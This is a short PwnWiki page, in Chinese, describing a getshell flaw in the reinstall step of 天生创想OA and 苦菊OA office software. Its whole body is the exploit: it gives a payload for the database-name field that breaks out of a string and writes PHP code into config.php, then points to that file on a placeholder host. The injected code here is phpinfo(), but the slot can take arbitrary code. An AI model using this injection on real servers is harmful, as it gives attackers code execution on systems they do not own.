天生创想OA&苦菊OA重装系统Getshell漏洞

From PwnWiki
This page is a translated version of the page 天生創想OA&苦菊OA重裝系統Getshell漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞利用

第二步:填写服务器配置信息 - 数据库名称写入以下Payload:

kuju');phpinfo();//

访问

http://www.xxxx.com/config.php